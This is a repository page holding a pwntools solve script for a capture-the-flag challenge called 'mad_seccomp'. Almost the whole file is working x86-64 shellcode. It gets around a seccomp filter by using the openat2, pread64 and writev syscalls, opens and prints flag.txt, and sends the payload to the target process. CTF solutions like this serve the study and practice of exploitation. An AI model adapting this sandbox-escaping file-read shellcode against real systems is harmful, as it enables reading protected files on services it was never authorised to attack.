jc/ctfs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
ctfs/random_challs/mad_seccomp/a.py
T
jc 4153f58c73 solve script
2024-10-28 16:26:11 +03:00

40 lines
578 B
Python
Raw Permalink Blame History

#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./mad_seccomp", checksec=False)
r = process()
# funcs
s = lambda a: r.send(a)
# shellcode
sc = """
lea rsi, [rax+108]
lea rdx, [rax+200]
mov QWORD PTR [rdx], 2
mov QWORD PTR [rdx+16], 16
mov rax, 437
mov rdi, -100
mov r10, 24
syscall
mov rdi, rax
mov al, 17
lea rsi, [rdx+100]
mov rdx, 100
sub r10b, r10b
syscall
lea r11, [rsi]
mov QWORD PTR [rsi+100], r11
mov QWORD PTR [rsi+108], rax
mov rdi, 1
lea rsi, [rsi+100]
mov rdx, 1
mov rax, 20
syscall
"""
sc = asm(sc)
sc += b"flag.txt\0"
s(sc)
r.interactive()
Reference in New Issue View Git Blame Copy Permalink